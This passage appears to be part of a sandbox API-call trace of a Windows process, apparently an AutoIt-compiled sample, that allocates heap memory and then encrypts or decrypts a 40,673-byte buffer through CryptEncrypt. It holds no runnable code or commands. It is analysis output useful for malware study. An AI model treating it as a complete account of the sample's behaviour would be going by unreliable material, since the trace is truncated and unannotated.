Size=0x10) returned 0x889490 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0036.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0036.841] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.841] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0036.841] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.841] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd00 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0036.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ac0 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0036.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0036.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0036.842] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.842] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0036.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0036.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce68 | out: hHeap=0x770000) returned 1 [0036.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0036.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0036.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0036.843] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.843] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da158 | out: hHeap=0x770000) returned 1 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0036.844] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0036.844] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0036.844] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0036.845] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da368, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da368*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0036.845] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.845] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0036.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.845] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.845] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0036.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0036.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.845] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.845] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0036.845] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.845] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.845] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.845] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0036.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.845] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0036.845] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.845] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0036.846] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.846] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.846] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.846] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.846] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.846] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.846] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da248 | out: hHeap=0x770000) returned 1 [0036.846] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.847] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.847] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x9ed1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x9ee0) returned 1 [0036.847] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.847] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.847] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.847] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.847] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.847] CharLowerBuffW (in: lpsz="byte[40673]", cchLength=0xb | out: lpsz="byte[40673]") returned 0xb [0036.847] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.849] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.849] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.849] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.849] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0036.850] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0036.850] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x935008*, pdwDataLen=0x6ae220*=0x9ed1, dwBufLen=0x9ee0 | out: pbData=0x935008*, pdwDataLen=0x6ae220*=0x9ee0) returned 1 [0036.850] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.850] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.850] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0036.850] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.852] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.852] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0036.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0036.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.853] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.853] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0036.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0036.853] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.853] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0036.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0036.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889550 | out: hHeap=0x770000) returned 1 [0036.853] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.853] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0036.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0036.853] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0036.853] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.853] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.853] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0036.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0036.854] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0036.854] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0036.858] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.858] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.858] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0036.858] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.861] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.861] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0036.861] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0036.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0036.861] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0036.861] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0036.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0036.861] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0036.861] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, 